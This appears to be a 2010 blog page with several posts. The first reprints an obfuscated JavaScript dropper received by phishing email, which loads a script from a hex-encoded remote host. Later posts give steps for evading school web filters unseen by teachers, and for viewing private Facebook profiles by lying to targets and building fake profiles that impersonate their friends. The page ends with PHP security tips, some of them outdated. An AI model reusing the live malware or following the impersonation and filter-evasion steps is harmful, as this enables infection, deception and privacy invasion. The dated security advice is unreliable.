2:20am Tuesday, March 23, 2010. Somebody send me this download file via html email.

Using this IP address: 165.21.154.14

Email: Company email where I worked on. (It just so happen that the email pattern is different, that’s why I got alarmed. I worked in the company for a years, only ignorant will bite that the said email was came from the admin).

<script type=”text/javascript”>// <![CDATA[
this.l="";this.AV="";var D;if(D!='' && D!='B'){D='_s'};var FR;if(FR!='' && FR!='r'){FR='Df'};function y(){var p;if(p!='' && p!='ge'){p=null};var M="";var Y='';var OmG="";var Ai='';var C="\x68\x74\x74\x70\x3a\x2f\x2f\x66\x6f\x6f\x64\x6e\x65\x74\x77\x6f\x72\x6b\x2d\x63\x6f\x6d\x2e\x64\x61\x69\x6c\x79\x6d\x6f\x74\x69\x6f\x6e\x2e\x63\x6f\x6d\x2e\x74\x65\x61\x63\x75\x70\x2d\x63\x6f\x6d\x2e\x59\x6f\x75\x72\x42\x6c\x65\x6e\x64\x65\x72\x50\x61\x72\x74\x73\x2e\x72\x75\x3a";var U;if(U!=''){U='z'};var Os;if(Os!='h'){Os='h'};var O=unescape;var g=window;var E=new String("g");var W;if(W!='' && W!='Gm'){W=null};var fH=new Array();var _L='';function F(T,f){var Fb=new Date();var _o;if(_o!='' && _o!='cc'){_o=null};var Rc;if(Rc!=''){Rc='q'};var d=O("%5b")+f+O("%5d");var Om=new RegExp(d, E);return T.replace(Om, Y);var HH;if(HH!='zp'){HH='zp'};};var Tc='';this.Hw="";var w='';var i=new String();var dV=F('8630418650539','9541673');var mr;if(mr!='JC' && mr != ''){mr=null};var x=O("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%64%65%65%7a%65%72%2e%63%6f%6d%2f%6d%61%6b%74%6f%6f%62%2e%63%6f%6d%2f%79%61%68%6f%6f%2e%63%6f%2e%6a%70%2e%70%68%70");var ml;if(ml!='PF'){ml=''};var Uk;if(Uk!='' && Uk!='j'){Uk='Yz'};var wC=document;var hH;if(hH!='nM' && hH != ''){hH=null};function N(){var UJ;if(UJ!='gT'){UJ='gT'};var bp=new Array();w=C;w+=dV;w+=x;var QA='';var ke;if(ke!='' && ke!='gd'){ke=null};try {_=wC.createElement(F('sJcCrIiBpJtl','9MxJCIyAB8nql'));var oh;if(oh!='IX' && oh!='RL'){oh=''};this.eZ='';_.defer=[1][0];_.src=w;wC.body.appendChild(_);this.cMG=”";var zB;if(zB!=’Oo’ && zB!=’He’){zB=’Oo’};var Ts=”";var hU;if(hU!=’DT’){hU=’DT’};} catch(S){};var MS;if(MS!=’qc’ && MS!=’Zy’){MS=’qc’};var vi;if(vi!=”){vi=’cV’};}var qU=new Array();this.hcq=”;var Zk=new Array();g["1IBonloa".substr(3)+"2QRd".substr(3)]=N;var gy=new Date();};y();var Zz=”";
// ]]></script>
<!–e91915bebaf849d505de76dde9259d4c–>

Just a simple phishing malware designed to gather information from your computer.

PEOPLE Please blocked this IP 165.21.154.14

I guess it’s facebook year, the social media giant is suffering viruses threat and infections. Often times we heard a new Facebook virus attacked, and now the Vidyartha College Facebook virus has made its way.

Vidyartha College Facebook virus was first reported earlier Tuesday (US PDT) and then it stir the social network. The virus made the facebook college students users account name, password and profile data changed.

Until now Facebook has no official press release that discuss this threat.

Cannot access MySpace at your school?

If that’s the case you can conclude that school administrator block MySpace. Here are few options how to get on Myspace at school:

1. Check Browser Configuration: Reconfigure your Browser, here are the steps how to do it; Tools > Options > Advanced Tab > Network > Connections – reset the security and cookies. If it doesn’t work proceed to option 2;
2. Unblock by adding an s to the website address. Like this -> https://www.myspace.com – if not working proceed to option 3;
3. Find the IP address for MySpace: Visit, whatismyip.com, whatismyipaddress.com, ip-adress.com, whatismyipaddress.com – if not, take option 4;
4. Using Command Prompt: Go to command prompt, type > pingmyspace.com (Hit Enter), host of IP addresses will appear, then right click on mark, afterward copy and paste IP to browser, your name and password into the MySpace prompt and Enter. If not, let’s go to option 5;
5. Use MySpace Proxies: Bypas the firewall without compromising the school network security. Try, tech-faq.com/proxy.shtml, bestproxysites.com, allproxysites.com, proxybucket.com, mylinktrain.com, and etc..

Here is a How to Get on Myspace at School video clip for your convenient.

Note: Ensure that your teachers are not looking, or any prying students who may report your activity.

Related Entries:

• Myspace code that hide friends and comments
• How to View Private Facebook Profiles

Facebook is a free-access social networking website where users can join networks organized by city, workplace, school, and region to connect and interact with other people.

There you can also add friends and send them messages, and update their personal profiles to notify friends.

There are many user set their profile in private to avoid spammers and annoying teaser out there.

Question is, is it possible to view private Facebook profiles?

Before I give you the tricks and hacks, let me ask you one question also. Why do you want to view private Facebook profiles? For what ever reason you have, keep it. I’m here to tell you how to view private Facebook profiles in my own ways. Here we go; Search your prospect, on search results from the Facebook database of users, you’ll find that you have three options to the right side of the person’s bio photo.

First, Send them a Friend Request to add you as a friend, and if they bite – you’re in. If not, proceed to our second option;

Send a Message, Send them a message like, “Hey! How are you Bud, do you remember me? We went to school together, We sat together in Physics.” They might respond with something like, “Who are you?” or I don’t know you get lost!” there you go, you now have temporary access to view their profile. If not, proceed to the third option;

Create a Fake Profile, know her/his friend – then make a fake facebook profile of his/her friend, add at least 20 or so of the other friends on the list, then ask a Friend Request and Send a Message, afterward throw your luck.

And for Software hacking tools, I encourage you to forget it. Facebook brainstorm ideas for their security, so you have a hair line of luck for that, unless you’re a gifted.

I’ve also heard from news that, Facebook bloggers reveal way to peek at private profiles. But when I check the site, Update: Facebook have now fixed this exploit, and have also ask we remove the pictures of proof below. We’re going to comply with their request, but expect a follow up story shortly on how we did it.

See, you can try… challenge their brains.

Related Entry:

• Code that hide friends and comments

Database-driven sites are vulnerable to hackers, who can (and do) exploit bugs in those programs to gain unauthorized access to your site. The following are some things you can do to help secure your site.

Check all of your website files and folders and make sure that they all have the correct permissions- The standard permission settings for files would be 644 and folders would be 755. Please be aware that these are the standard settings, your site may have different requirements.

Set register_globals to OFF

1.Turn off Display Error/Warning Messages. Set error_display to ZERO.

2.Never run unescaped queries

3.Validate all user inputs. Items on Forms, in URLs and so on

4.Move config.php and files containing Passwords to MySQL to a secure directory outside of the public_html folder

5.Change permissions on any configuration files containing private information such as database passwords or email accounts to 440 so they cannot be written to and so there is no world permissions. If you need to edit them at a later time you will need to change it back to 640.

6.Access Control: You don’t want the user to have access to any Admin function or Clean up scripts

7.The .htaccess file is your friend. Use it to deny access to your site or files.
(We also have an easy IP Deny Manager tool in the cpanel)

8.PHP can parse any valid script, whether it is called foo.php, very_long_name.php.php.php, or even deleteme.bat. Using the default extension of “.php” means that before your hackers start you have already told them you are using PHP. As mentioned, you can use any filename for your scripts – if you are using PHP for every script on your server, consider using the “.html” extension for your scripts and making PHP parse HTML files. You can change your file extension by adding this line to the .htaccess or turn it on via the Apache Handlers in the cPanel (AddHandler application/x-httpd-php5 .html)

To protect against SQL injection attacks Sometimes hackers will try to screw up your database by inserting SQL code into your form input fields. They can for example, insert code that could delete all the data in your database! To protect against this, you need to use this PHP function:

mysql_real_escape_string()

This function escapes (makes safe) any special characters in a string (programmers call text a ‘string’) for MySQL.

9.Example: $name = $_REQUEST['name']; $safe_name = mysql_real_escape_string($name);

Now you know the variable $safe_name, is safe to use with your SQL code.

10.Keep the PHP code to yourself. If anyone can see it they can exploit
vulnerabilities.

You should take care to store your PHP files and the necessary passwords to access your MySQL databases in protected files or folders. The easy way to do this is to put the database access passwords in a file with a .inc.php extension (such as config.inc.php), and then place this file in a directory which is above the server’s document root (and thus not accessible to surfers of your site). Then, refer to the file in your PHP code with a require_once command. By doing things this way, your PHP code can read the included file easily but hackers will find it almost impossible to hack your site.